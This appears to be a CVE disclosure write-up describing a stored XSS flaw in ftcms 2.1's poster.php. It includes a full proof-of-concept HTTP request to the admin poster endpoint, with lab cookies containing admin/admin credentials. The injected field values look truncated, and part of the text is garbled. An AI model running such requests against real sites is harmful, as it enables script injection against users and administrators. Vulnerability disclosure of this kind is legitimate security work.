Headline
CVE-2022-37731: webvue2/ftcmsxss.md at gh-pages · whiex/webvue2
ftcms 2.1 poster.PHP has a XSS vulnerability. The attacker inserts malicious JavaScript code into the web page, causing the user / administrator to trigger malicious code when accessing.
Ftcmsxss vulnerability
Vulnerability Description:
poster. PHP has XSS vulnerability. The attacker inserts malicious JavaScript code into the web page, causing the user / administrator to trigger malicious code when accessing, so as to achieve the purpose of attack.
Vulnerability impact:
Ftcms2.1
Vulnerability code analysis:
The post method receives the data submitted by users without filtering restrictions on the data submitted by users
Then show him directly.
Vulnerability recurrence POC:
POST /ftcms_v2.1/admin/index.php/poster/add_type HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------67923751529856257962470253000 Content-Length: 478 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ftcms_v2.1/admin/index.php/poster/add_type Cookie: UM_distinctid=17fa054f6b24c4-01fb2c97ea5a758-4c3e2d72-14a61c-17fa054f6b42db; CNZZDATA1277817436=1845628291-1647658540-%7C1647658540; skinColor=%2Ftemplets%2Fyycms%2Fcss%2Fmytheme-color1.css%3Fv%3D2.3; history=%5B%7B%22name%22%3A%22%E6%88%98%E7%8B%BC%E7%89%B9%E6%94%BB%E9%98%9F%22%2C%22pic%22%3A%22%22%2C%22link%22%3A%22%2Fqxplay%2F82.html%22%2C%22part%22%3A%221%22%7D%5D; debug-bar-tab=ci-events; debug-bar-state=minimized; Hm_lvt_ff7ff59731fd28defa244db58332ee7f=1659488611; Hm_lpvt_ff7ff59731fd28defa244db58332ee7f=1659488611; PHPSESSID=4cdcf6d279bf87697a923efd30719924; username=admin; pwd=admin; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227835677b81bdb97c301c50a7cabd8c2c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A80%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A103.0%29+Gecko%2F20100101+Firefox%2F103.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1659510907%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221659489291%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7D919898205c1354b76a383744f10fbc5bcf4722d8 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1
-----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="info[name]"
"> -----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="info[des]"
“> -----------------------------67923751529856257962470253000 Content-Disposition: form-data; name="dosubmit”
æ��交 -----------------------------67923751529856257962470253000—